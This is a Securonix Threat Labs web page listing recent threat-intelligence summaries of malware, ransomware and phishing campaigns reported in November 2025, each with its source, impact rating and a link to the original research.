Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.

four prong diagram about detection, data, and threat research and hunting

securonix autonomous threat sweep detection report sample

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Learn More

Latest ATS Entries

All indicators of compromise (IOC) and search queries are available on our GitHub repository.

Intel Source:: Seqrite

Intel Name:: Operation_Silk_Lure_Scheduled_Tasks_Weaponized

Date of Scan:: 2025-11-09

Impact:: LOW

Summary:: Researchers at Seqrite found a cyber-espionage campaign where attackers sent fake Chinese résumés to HR teams. When opened, the file secretly installs malware using Windows Task Scheduler and hidden DLL files. The malware, called ValleyRAT, steals data, monitors the computer, and connects to hidden servers in Hong Kong. It primarily targets people working in crypto trading and financial technology companies.

Source: https://www.seqrite.com/blog/operation-silk-lure-scheduled-tasks-weaponized-for-dll-side-loading-drops-valleyrat/

Intel Source:: Securonix Threat Research

Intel Name:: CHAMELEON_NET_Spreads_FormBook_via_DarkTortilla

Date of Scan:: 2025-11-09

Impact:: HIGH

Summary:: Researchers at Securonix Threat Research have identified CHAMELEON#NET, a sophisticated malspam campaign that delivers the FormBook RAT via a multi-stage DarkTortilla loader, targeting phishing emails impersonating national social security institutions lure victims to a fake webmail portal where they download an archive (81__POP1.BZ2) containing a heavily obfuscated JavaScript dropper (POP2.js) that spawns Base64-encoded payloads (adobe.js, svchost.js) which install a VB.NET loader (QNaZg.exe) — a DarkTortilla variant that decrypts an embedded DLL with a custom XOR cipher and reflectively loads it in memory via AppDomain.Load(byte[]) to avoid disk-based detection, the decrypted Segwenservice.dll is identified as FormBook RAT, configured through AES-encrypted resources to manage persistence, anti-VM checks, and credential theft, establishing persistence via registry Run keys and AppData startup implants while masquerading as word.exe and disabling Windows Defender, performing keylogging and data exfiltration to a DuckDNS C2 at, and demonstrating extensive fileless reflective loading, multi-layer obfuscation, and time-based sandbox-evasion using ping delays.

Source: https://www.securonix.com/blog/chameleonnet-a-deep-dive-into-multi-stage-net-malware-leveraging-reflective-loading-and-custom-decryption-for-stealthy-operations/

Intel Source:: Acronis

Intel Name:: DragonForce_Rebrands_as_Expanding_Ransomware_Cartel

Date of Scan:: 2025-11-09

Impact:: HIGH

Summary:: Researchers at Acronis Threat Research Unit have identified that DragonForce, a Conti-derived ransomware-as-a-service (RaaS) operation active since 2023, has rebranded into a full-fledged ransomware cartel, enabling affiliates to white-label its encryptor and release variants such as Devman and Mamona/Global. The group employs BYOVD attacks using vulnerable kernel drivers (truesight.sys, rentdrv2.sys) to disable security tools prior to encryption and shares code lineage with LockBit Green via Conti v3 leaks. DragonForce’s affiliate program offers 80% profit shares and infrastructure access, and its alliance with Scattered Spider, a group specializing in SIM-swapping, MFA bypass, and vishing, provides initial access and data exfiltration via AnyDesk, ScreenConnect, and cloud platforms like MEGA or Amazon S3. Since late 2023, DragonForce affiliates have exposed over 200 enterprise victims across industries including retail, airlines, MSPs, and insurance, with the Marks & Spencer breach notably linked to the DragonForce–Scattered Spider partnership. Rebuilt using MinGW from Conti’s leaked source, the malware encrypts Windows, Linux, and ESXi systems with ChaCha20 and RSA-wrapped keys, referencing configuration files for process-kill lists (MsMpEng.exe, sql.exe) and whitelisted paths.

Source: https://www.acronis.com/en/tru/posts/the-dragonforce-cartel-scattered-spider-at-the-gate/

Intel Source:: ASEC

Intel Name:: Cephalus_Ransomware_Fake_Key_Evasion

Date of Scan:: 2025-11-08

Impact:: HIGH

Summary:: Researchers at AhnLab Security Emergency response Center (ASEC) have identified a new ransomware group named Cephalus, first observed in June 2025 and motivated solely by financial gain. The group primarily breaches organizations by stealing credentials through Remote Desktop Protocol (RDP) sessions that lack multi-factor authentication (MFA). Once inside, Cephalus exfiltrates sensitive data and encrypts systems to pressure victims into payment. The ransomware, written in Go, employs advanced evasion mechanisms such as generating fake AES keys to mislead analysts and utilizing the AES-CTR encryption mode to minimize key exposure in both disk and memory. Cephalus disables Windows Defender’s protections, deletes Volume Shadow Copies, and terminates backup services like Veeam and MSSQL to ensure irrecoverability of encrypted data. Its SecureMemory routines, including memory-locking and XOR-based key masking, further protect its encryption keys from forensic recovery.

Source: https://asec.ahnlab.com/en/90878/

Intel Source:: Twitter

Intel Name:: Windows_SSH_backdoor

Date of Scan:: 2025-11-08

Impact:: MEDIUM

Summary:: PRODAFT researchers have identified that the FIN7 threat group, also known as Savage Ladybug, is actively deploying a Windows-based SSH backdoor to maintain persistent access and exfiltrate data from enterprise systems. This campaign leverages legitimate OpenSSH components along with a batch script to automate deployment and establish covert communication channels between compromised hosts and attacker-controlled servers. By exploiting legitimate SSH protocols, FIN7 establish encrypted reverse SSH and SFTP connections that seamlessly blend with legitimate administrative traffic, making detection highly challenging. The backdoor facilitates persistent remote access, lateral movement, and data theft while leaving minimal forensic traces within security logs.

Source: https://x.com/PRODAFT/status/1985731361492050255

Intel Source:: ASEC researchers

Intel Name:: Rhadamanthys_Malware

Date of Scan:: 2025-11-07

Impact:: LOW

Summary:: "Researchers at AhnLab Security Intelligence Center (ASEC) identified a new distribution method for the Rhadamanthys infostealer, a well-known malware family that steals credentials, cryptocurrency wallets, browser data, and system information. In this campaign, threat actors disguise Rhadamanthys as a legitimate Ren’Py visual novel game, a Python-based open-source game engine used by indie developers and available on platforms like Steam. The attackers embed the malware into the game’s script files so that when users run what appears to be a harmless game executable, the malicious loader activates and installs Rhadamanthys in the background. This campaign leverages social engineering and gaming communities (especially free game forums and file-sharing sites like MediaFire) to infect unsuspecting users."

Source: https://asec.ahnlab.com/en/90767/

Intel Source:: Pulsedive

Intel Name:: Kimsuky_JavaScript_Dropper_Analysis

Date of Scan:: 2025-11-07

Impact:: HIGH

Summary:: Researchers at Pulsedive Threat Research have identified a new Kimsuky intrusion chain leveraging a JavaScript-based dropper to establish persistence and exfiltrate system information from Windows hosts. The investigation revealed that the dropper executes multiple stages, beginning with a lightweight JavaScript file responsible for retrieving and executing additional payloads from adversary infrastructure. The subsequent stage performs host reconnaissance by collecting system configuration details, running processes, and directory listings, which are then compressed and transmitted to the attacker’s command server. The malware further modifies Windows registry keys and creates scheduled tasks to maintain continuous execution, ensuring the dropper remains active even after reboot.

Source: https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper/

Intel Source:: ASEC researchers

Intel Name:: Beast_Ransomware_Hidden_in_GUI

Date of Scan:: 2025-11-07

Impact:: LOW

Summary:: "Researchers at AhnLab Security Intelligence Center (ASEC) analyzed a newly emerging ransomware group called Beast, which evolved from the Monster ransomware family. The Beast group began operating as a Ransomware-as-a-Service (RaaS) in February 2025 and launched their Tor-based leak site (“Beast Leaks”) in July 2025. As of August 2025, they had publicly named 16 victims across North America, Europe, Asia, and Latin America, targeting multiple sectors such as manufacturing, construction, healthcare, education, and business services. Beast ransomware stands out for its technical sophistication, interactive GUI interface, and advanced anti-recovery mechanisms, making decryption nearly impossible without the attackers’ key."

Source: https://asec.ahnlab.com/en/90792/

Intel Source:: AhnLab SEcurity intelligence Center

Intel Name:: ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire

Date of Scan:: 2025-11-06

Impact:: LOW

Summary:: "Researchers at ASEC discovered that the Kinsing (also known as H2Miner) threat actor is exploiting the Apache ActiveMQ vulnerability (CVE-2023-46604) to infect both Linux and Windows systems. The attackers use this flaw to remotely install several malware families, including XMRig (cryptominer), Sharpire (.NET backdoor), Cobalt Strike, and Meterpreter for system control and post-exploitation. This marks a shift in Kinsing’s activity—from simple cryptocurrency mining to full system compromise and remote control—making it a more serious and versatile threat."

Source: https://asec.ahnlab.com/en/90811/

Intel Source:: Cybereason

Intel Name:: Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit

Date of Scan:: 2025-11-06

Impact:: HIGH

Summary:: Researchers at Cybereason have identified Tycoon 2FA, a sophisticated Phishing-as-a-Service (PhaaS) kit active since August 2023 that using a reverse-proxy Adversary-in-the-Middle (AiTM) technique to bypass MFA/2FA on Microsoft 365 and Google (Gmail) accounts by intercepting credentials and session cookies in real time for full account compromise. The kit delivers phishing links via PDFs, PowerPoint, SVG files, and malicious websites often hosted on cloud platforms (Amazon S3, Dropbox, Canva), and performs domain, CAPTCHA, debugger, and bot checks prior to redirection to evade automated analysis. Its multi-stage JavaScript chain employs base64, XOR, and AES-encrypted code with CryptoJS-driven dynamic decryption, heavy obfuscation, and memory-only execution, it gathers user-agent and geolocation data, encrypts the data with hardcoded AES keys, and transmits it via AJAX POSTs to attacker-controlled C2 endpoints. The AiTM proxy relays credentials to legitimate servers while dynamically rendering authentic error messages and MFA prompts, making the phishing flow nearly indistinguishable from real logins and the kit’s adaptive design tailors attacks to victims’ authentication policies.

Source: https://www.cybereason.com/blog/tycoon-phishing-kit-analysis

View All

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.

Visit Our Sigma Page